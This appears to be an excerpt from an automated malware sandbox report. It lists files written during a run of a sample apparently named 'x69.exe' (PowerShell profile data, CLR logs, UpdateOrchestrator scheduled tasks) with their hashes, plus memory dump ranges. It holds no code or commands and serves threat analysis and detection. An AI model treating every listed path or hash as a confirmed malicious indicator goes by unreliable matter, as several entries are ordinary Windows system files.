MD5 1542328a8546914b4e2f1aef9cb42bea
SHA1 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f
SHA256 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737
SHA512 b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/640-570-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/2700-569-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/5232-571-0x000001BAFEC20000-0x000001BAFEC4A000-memory.dmp

memory/5232-572-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp

memory/4828-575-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp

memory/4828-574-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp

memory/5232-573-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp

memory/5088-581-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5088-579-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4480-589-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp

memory/5088-591-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp

memory/5088-590-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp

memory/4480-588-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp

memory/5088-578-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5088-577-0x0000000140000000-0x0000000140008000-memory.dmp

memory/676-615-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp

memory/384-630-0x000001B877080000-0x000001B8770AC000-memory.dmp

memory/960-626-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp

memory/960-625-0x000002B8D1BA0000-0x000002B8D1BCC000-memory.dmp

memory/960-619-0x000002B8D1BA0000-0x000002B8D1BCC000-memory.dmp

memory/676-614-0x000002107C320000-0x000002107C34C000-memory.dmp

memory/676-608-0x000002107C320000-0x000002107C34C000-memory.dmp

memory/616-604-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp

memory/616-603-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp

memory/616-597-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp

memory/616-596-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp

memory/616-595-0x0000015CFBB10000-0x0000015CFBB36000-memory.dmp

memory/5088-592-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5088-576-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa187cac09f051e24146ad549a0f08a6
SHA1 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA256 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/2700-1559-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/640-1560-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/4472-1561-0x0000000000F90000-0x0000000000F99000-memory.dmp